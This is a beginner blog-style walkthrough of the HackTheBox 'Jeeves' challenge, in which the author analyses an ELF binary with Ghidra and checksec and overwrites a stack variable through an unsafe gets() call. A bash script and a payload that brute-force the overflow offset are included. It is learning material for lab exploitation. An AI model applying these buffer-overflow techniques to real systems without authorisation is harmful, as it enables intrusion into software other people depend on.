Getting Started in Binary Exploitation

N0ur5
11 min readJul 20, 2024

--

Hello Reader,

Today I am going to break out of the blogging and studying slump that I have been in by touching on a subject that I personally haven’t dealt with much despite being a pentester of several years. This subject is the art of binary exploitation. I am unsure how much this class of vulnerability still occurs “in the wild” but in my mind, studying binary exploitation will begin to help further my understanding of how binaries work. It was something that OSCP used to push students to learn so that they could complete the buffer overflow modules/challenges, however they have really taken that concept out of the exam in favor of a heavier focus on the more commonly targeted Active Directory. HackTheBox has a learning path called “Intro to Binary Exploitation” which is another contributing factor to why I am deciding to get into this area of study for a little while.

So, where do we start with analyzing a binary file? As I mentioned, I am starting with the HackTheBox Learning Path for this exact subject, and the first challenge listed for this learning path is called “Jeeves”. So, the Jeeves challenge is where I will start! HackTheBox hosts the ELF binary called “Jeeves” which is downloaded in a ZIP file that simply contains the single Jeeves binary. Once the file is obtained by unzipping the file with the password provided by HackTheBox, the analysis can begin.

First, we can confirm the file type with the “file” command:

file ./jeeves
As per Wikipedia “In computing, the Executable and Linkable Format[2] (ELF, formerly named Extensible Linking Format), is a common standard file format for executable files, object code, shared libraries, and core dumps.”

We can also run the “strings” command which can sometimes give away tidbits of useful information.

strings ./jeeves
We can see “flag.txt” — a commonly targeted file when completing web based “hacking” challenges or labs. We can see also that the file was complied with GCC, along with some other strings that are likely to be seen by the user who runs the application.

Most simple of all perhaps — we can simply run the binary!

chmod +x ./jeeves  #allows for the file to be executed
./jeeves #executes the file
The file asks for our name, and then tells us to have a great day. How nice ❤

Again — this is not a topic I know much about… however what I do know is most entry level challenges/labs for binary exploitation usually start with the concept of a buffer overflow — or a vulnerability in a binary where the application doesn't properly restrict the size of user-input. Given that we are asked for basic input and then the input is returned to us, I am already assuming that is going to be conceptually what we are dealing with in the Jeeves challenge.

To get a better idea of what the application is doing we *could* run objdump on Jeeves — but this results in a very ugly “assembly code” (a symbolic representation of “machine instructions”). I suppose if one was well-versed in assembly code — this tool alone might be enough to at least find the vulnerability in the code.

objdump -d ./jeeves
Only a fraction of the output from “objdump”.

Since I am certainly not well versed in assembly code (a topic I will certainly touch on, in the future), I wanted to understand what other tools could be used here. It seems like the perfect use case for a tool called “Ghidra”.

This tool was released during the 2019 RSA convention by the NSA. It was pretty big news when it happened within the cybersecurity world.

We have this fancy tool created by the NSA that is intended to reverse engineer software. If that doesn’t sounds like the right fit for binary exploitation, I don’t know what does! It wasn’t installed on the Kali Linux instance I had readily available so I went ahead and installed it from the Kali repository.

sudo apt-get install ghidra  #Downloads and installs Ghidra
ghidra #Launches Ghidra

Once Ghidra is open, you will need to create a new project and then import the jeeves file. I followed steps 1 and 2 from this other Medium article by “ax1al” https://medium.com/ax1al/exploring-ghidra-with-baby-elf-29c986e80a45 which did a great job of getting me rolling with Ghidra. Thanks ax1al!

At this point, I just double clicked on the binary file that was imported and I was presented with a pop-up that asked if I wanted to analyze the binary. I clicked “yes” and “analyze”, which brought me into the “CodeBrowser”. This was a place I could get lost quickly as several windows with plenty of output exist in this view. However, as a reminder — I do have some very limited knowledge on this topic and I know a good place to start is the “main” function. The “main” function is in several programming languages— a place where program execution starts. So I find the “main” function under the “Functions” within the “Symbol Tree” window.

Now, rather than trying to view the “main” function in assembly language to determine what it is doing, I can instead view the much easier “Decompliled” version of the code. To the best of my current understanding — Ghidra decompiles to a C-like program syntax to the best of it’s ability.

Quickly I notice many of the strings that I saw either when running the “strings” command, or when executing the application.

So, what are we looking at here?

  • Line 2: Creating the “main” function — with lines 4–22 being the main functions instructions
  • Lines 5–8 seem to be declaring variables
  • Line 10 initializes the “local_c” variable by assigning it 0x21523f2d as a value
  • Line 11 prints the first line we saw when we executed the binary
  • Line 12 allows for our user input (our name) and assigned the value we provide to the “local_48” variable
  • Line 13 prints the last line we saw when we executed the binary, after we provided our name
  • Lines 14–19 are part of an “if” statement which will only be executed IF the local_c variable is equal to “0x1337bab3”
  • Line 21 returns 0 which for the sake of this blog — we will just say, means the function ran succesfully. (Overly-simplified explanation of this line but not critical for todays topic)

My first thought is “ok so we need to make local_c equal to 0x1337bab3 to open “flag.txt” … but we are never in a situation where a value (variable) that we control is deliberately placed into the “local_c” variable”. Instead, the only variable we do have control over is “local_48”.

Ok so I’m trying to figure out how the heck we can control the value of a variable we can’t access?! Our name is assigned to the “local_48” variable, and other than the local_48 variable being used in the next line to print our name to the console:

printf("Hello %s, hope you have a good day!\n",local_48)

… we do not see that variable used again in the main function.

This is where my original theory — that a buffer overflow of sorts might be the solution here. So to investigate that theory further, we look more closely at how the data we can enter is handled. Two things we see are

  1. How the data is accepted. It is via the “gets()” function.
gets(local_48);

2. How the variable local_48 gets declared in the very beginning of the main function.

char local_48 [44];

“char” type just means the variable can store characters and letters (string variables), and the [44] means the buffer size (intended maximum size for the string placed into the variable — aka our name) should not be larger than 44 bytes. HOWEVER — according to the official man page (program manual) for “gets()”:

https://man7.org/linux/man-pages/man3/gets.3.html

In others words — “gets()” is a vulnerable C function, and the Jeeves application is accepting our user input with this very same function! So now we know *how* the application is vulnerable. Next we need to know *how* to exploit this!

Starting simple — we can use python to generate a string of a specific length (although you are more than welcome to try to manually type of long strings of a specific length haha) — and see if at any point a segmentation fault occurs. This usually is a sign that the application crashed.

We already tried entering a basic name when we ran the application earlier, so even if we didn’t understand the code we looked at to know the intended buffer — we would at least know it handled that “normal” or expected input correctly since it told us “hope you have a good day!” and then exited correctly. So as I started to say before I meme-dropped — lets use python to generate a long string of exactly 64 “A” characters. Why 64? Because it’s a good amount of bytes over the programmed “44” byte buffer.

python -c "print('A' * 64)"

Now let’s stuff those 64 “A”s into the “local_48” variable by entering them in when the application asks for our name.

The application appears to handle this just fine. I believe this is because the input is larger than the buffer — but not large enough to overwrite anything in memory that would cause the application to crash (like that “return 0”, for example). So lets bump the “A” count up to 100 using the same method as we just did.

Segmentation fault successful :) We are on the right track.

We got the segmentation fault by providing too large of a string! I think that means we are getting closer to our goal by overwriting the return address. Many times, a buffer overflow exploit occurs because strings can escape the intended boundary and overwrite the instruction that tells the program where to go next. But one protection that could prevent this called PIE is being leveraged with the application.

“PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.”

Source: https://ir0nstone.gitbook.io/notes/types/stack/pie

How do we know this protection is enabled? We can find out with the “checksec” application.

checksec --file=./jeeves

Another option exists for exploitation using the buffer overflow though…

The function stack in memory has the local variables at the top and the stack grows downward.

The vulnerable variable is higher than the variable that we wanted to gain control over (local_c) which I believe at this point means, due to the use of the vulnerable “gets()” function to obtain the value for “local_48” (variable containing our name), we should be able to start overwriting the variables below the one we can control! Here is a crude image of the concept.

Notice that eventually, we will be starting to control the value of local_c 😃. I wondered what the best way to achieve this was. In my experience as a pentester, I’ve learned that sometimes doing the same thing in different ways helps reinforce the concept. So I started with some good old bash scripting to essentially brute force the solution using the information I have obtained about the goal up to this point. So what will that look like? I will basically stick the hex value that we want into the “local_48” variable, and then continually add padding and rerun the application until the overflow perfectly aligns, placing the “0x1337bab3” value into the “local_c” variable.

First we script the byte-by-byte increase of the buffer, which looks fun…

Then I needed to append the proper hex value to the end each time. To get that payload, I use python for this.

python -c 'print "\xb3\xba\x37\x13"'

Ok so now, I *think* we have everything we need to feed the growing buffer combined with the 1337bab3 payload to the jeeves program, while waiting for the application to print “Pleased to make your acquaintance” which we know from the “if” statement earlier, will be printed when the if statement is true.

Steady hand with the highlighter tool 👀

So the last two things I think I want to add to my script are:

  1. search for the string “acquaintance” and only print the message if it’s in the output, otherwise our terminal will be a mess.
  2. print the buffer size that was needed to trigger the solution to this challenge.

After a few minutes, my code looks like this…

#!/usr/bin/bash

for i in {44..100};
do
buffer=$(python -c "print('A' * $i)")
payload=$(python -c 'print "\xb3\xba\x37\x13"')
result=$(echo $buffer$payload | ./jeeves)
string="acquaintance"
if [[ $result == *$string* ]]; then
echo "HIT ON BUFFER SIZE $i"
echo $result
exit 1
fi
done

The above is basically just bash “for” loop. Where the value of “i” starts at 44 (the intended buffer), and continues up to 100. That number will be the number of “A”s printed out by python in the “buffer” variable. Then, we will use python to create the proper byte sequence for 0x1337bab3 (it goes in backwards — you will need to look into Little Endian to understand this better — as will I 😂). We will store that in the “payload” variable. Then we will combine the two variables (the buffer + the payload), and we will supply them to the jeeves program by “piping” the output (printing the variables out) to the jeeves program (with the “|” character). We set the “string” variable to be the word “acquaintance” and then we run an “if” statement that will only print out the jeeves output the if “string” variable is found in the output. It will also print us out the buffer size. Lets give it a whirl!

So now that we know the buffer size is 60, we can properly exploit the application by supplying the proper value to make the “if” statement in the jeeves program true. The reason the flag didn’t print is because we were “practicing” on the local file we unzipped early in this blog. However, HackTheBox provides a “live” version of this application running in a docker instance that is meant to be exploited once the exploit is developed. Since we have developed the exploit by finding that 60 characters followed by the bytes for 0x1337bab3 resulted in the application behaving in the way we wanted, we could now target the live version to get the flag.

The solution (buffer + payload) I just put into a file to make the next step easier.

Well, there we have it folks. The brute force approach to solving the jeeves binary exploitation challenge — which was to overwrite a variable on the stack that was later used in an “if” statement to determine if “flag.txt” would be printed or not!

I think that is all for this post. I hope to revisit this same challenege, as mentioned earlier — with a new approach. Rather than brute-forcing the buffer size “blindly”; we will look at how we can use “IDA” to take a more surgical approach to completing this challenge. IDA has a debugging feature that will give us some dynamic code analysis abilities — including looking at the stack while the application is running that we just had to imagine while we were overwriting the variables blindly with brute force.

Thanks as always!

N0ur5

--

--

N0ur5
N0ur5

Written by N0ur5

Pentester, bug hunter, red/purple teamer, all that good stuff.

No responses yet